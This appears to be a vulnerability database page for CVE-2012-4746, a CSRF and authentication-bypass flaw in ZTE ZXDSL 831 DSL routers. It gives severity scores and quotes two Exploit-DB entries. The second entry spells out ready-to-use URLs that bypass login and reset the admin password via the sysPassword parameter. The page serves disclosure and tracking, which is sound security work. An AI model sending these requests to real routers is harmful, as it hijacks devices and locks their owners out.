CVE-2012-4746
Published 2012-08-31
CVE-2012-4746: Cross-site request forgery (CSRF) vulnerability in accessaccount.cgi in ZTE ZXDSL 831IIV7.5.0a_Z29_OV allows remote attackers to hijack the authentication of…
Priority: P432, medium, 6.8 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.09% (61.2th percentile)
Cross-site request forgery (CSRF) vulnerability in accessaccount.cgi in ZTE ZXDSL 831IIV7.5.0a_Z29_OV allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via the sysPassword parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zte | zxdsl | — | — |
No detection rules found.
Exploit-DB
ZTE - Change Admin Password
exploitdb·2012-04-08
---
# Exploit Title: ZTE Change admin password
# Author: Nuevo Asesino
# Version: ZTE Inc., Software Release ZXDSL 831IIV7.5.0a_Z29_OV
#################################################################################################
Exploit By Nuevo Asesino
##################################################################################################
password ======> 123456
Now you can get the username & the password
Contact :[email protected] : Https:\www.facebook.com\Want.Revenge
Exploit-DB
ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities
exploitdb·2011-11-01
---
# Exploit Title: ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple vulnerabilities
# Date: 28 / 10 / 2011 .
# Authors: Mehdi Boukazoula ; Ibrahim Debeche .
# Software Link with patch :
# Version: v 831IIV7.5.0a_Z29_OV
# Tested on: v 831IIV7.5.0a_Z29_OV, May Affect all ZTE routers !!
# Description :
1 - Authentication bypass + Cross Site Request forgery
To bypass authentication go to URL : http://192.168.1.1/accessaccount.cgi
To get request forgery: the attacker can send the request from his browser without a cookie or any authentication, or send a link to the administrator:
USER ACCOUNT : http://192.168.1.1/accessaccount.cgi?usrUserName=user&usrPassword=111111
ADMIN ACCOUNT : http://192.168.1.1/accessaccount.cgi?sysUserName=admin&sysPassword=111111
No writeups or analysis indexed.
Published: 2012-08-31